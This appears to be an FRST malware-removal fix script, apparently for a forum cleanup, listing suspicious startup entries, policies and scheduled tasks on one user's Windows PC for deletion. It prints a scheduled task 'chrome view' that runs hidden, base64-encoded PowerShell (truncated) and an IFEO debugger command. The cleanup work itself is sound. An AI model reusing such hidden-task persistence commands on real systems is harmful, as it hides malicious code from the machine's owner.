start::
closeprocesses:
createrestorepoint:
cmd: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s
cmd :reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall" /s
Avast Update Helper (HKLM-x32\...\{19C3AB22-3718-4E4D-B203-242F5001565B}) (Version: 1.8.1206.2 - AVAST Software) Hidden 
CustomCLSID: HKU\S-1-5-21-3747113201-3398704821-205741979-1001_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> "C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" -ToastActivated => Pas de fichier 
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\StartupApproved\Run: => "AvastBrowserAutoLaunch_2803A90FFDA3F69244EFC38730BEF846" 
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Steam] => "A:\Steam\steam.exe" -silent (Pas de fichier) 
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [EADM] => "A:\Origin\Origin.exe" -AutoStart (Pas de fichier) 
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [RestMinder] => C:\Users\brend\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> ) <==== ATTENTION
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [AvastBrowserAutoLaunch_2803A90FFDA3F69244EFC38730BEF846] => "C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe" --check-run=src=logon --auto-launch-at-startup --profile-directory="Default" (Pas de fichier)
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Energy] => C:\Users\brend\AppData\Roaming\Energy\Energy.exe [134335810 2022-05-15] (EnergyApplication) [Fichier non signé] <==== ATTENTION 
C:\Users\brend\AppData\Roaming\Energy
C:\Users\brend\AppData\Local\Programs\RestMinder
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Facebook.MessengerDesktop] => C:\Users\brend\AppData\Local\Programs\Messenger\Messenger.exe messenger://openAtLogin (Pas de fichier)
C:\Users\brend\AppData\Local\Programs\Messenger
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [RestMinder] => C:\Users\brend\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> ) <==== ATTENTION
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [AvastBrowserAutoLaunch_2803A90FFDA3F69244EFC38730BEF846] => "C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe" --check-run=src=logon --auto-launch-at-startup --profile-directory="Default" (Pas de fichier)
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Energy] => C:\Users\brend\AppData\Roaming\Energy\Energy.exe [134335810 2022-05-15] (EnergyApplication) [Fichier non signé] <==== ATTENTION 
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
IFEO\vdsldr.exe: [Debugger] cmd /q (c) AveYo, 2021 /d/x/r>nul (erase /f/s/q %systemdrive%\$windows.~bt\appraiserres.dll&md 11&cd 11&ren vd.exe vdsldr.exe&robocopy "../" "./" "vdsldr.exe"&ren vdsldr.exe vd.exe&start vd -Embedding)&rem; 
Startup: C:\Users\brend\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-09-14]
ShortcutTarget: IMVU.lnk -> C:\Users\brend\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (Pas de fichier)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION 
Task: {2E014B1F-5B06-4B56-ABCF-21D2CD3C7091} - System32\Tasks\chrome view => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAkAGoAcAA9ACQAbgB1AGwAbAA7AAoACgAkAGEAcwBjAEUAbgBjAFQAeAB0AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoACgBmAHUAbgBjAHQAaQBvAG4AIABnAGUAdABJAHQAZQBtACgAWwBzAHQAcgBpAG4AZwBdAC (l'élément de données a 4995 caractères en plus). <==== ATTENTION 
Task: {95DD20B5-57D1-4739-BAF2-14F2C184BE3E} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --logon (Pas de fichier) 
Task: {AA2FB8FD-BC2B-4D73-BF5F-E2A7A38C0E3A} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /c (Pas de fichier) 
Task: {BC6070B0-8EC5-4E28-BA2A-BA669B236FAD} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --hourly (Pas de fichier) 
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (Pas de fichier) 
Task: {DED2D67E-A137-4C7F-ACCA-F9F81CCED109} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /ua /installsource scheduler (Pas de fichier) 
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] 
FF Plugin: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation) 
FF Plugin-x32: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation) 
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1206.2\npAvastBrowserUpdate3.dll [Pas de fichier]
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1206.2\npAvastBrowserUpdate3.dll [Pas de fichier]
FF Plugin-x32: @vlcstreamer.com/VLCStreamer Update;version=3 -> C:\Program Files (x86)\VLCStreamer\Update\1.3.99.0\npVLCStreamerUpdate3.dll [Pas de fichier]
FF Plugin-x32: @vlcstreamer.com/VLCStreamer Update;version=9 -> C:\Program Files (x86)\VLCStreamer\Update\1.3.99.0\npVLCStreamerUpdate3.dll [Pas de fichier] 
S2 avast; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /svc [X]
S3 avastm; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /medsvc [X]
S3 AvastSecureBrowserElevationService; "C:\Program Files (x86)\AVAST Software\Browser\Application\101.0.16113.42\elevation_service.exe" [X] 
S3 R0RazerSynapseService; \??\C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.sys [X]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
S3 wtbt; \??\f:\jeux\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
cmd: netsh advfirewall reset
emptytemp:
end::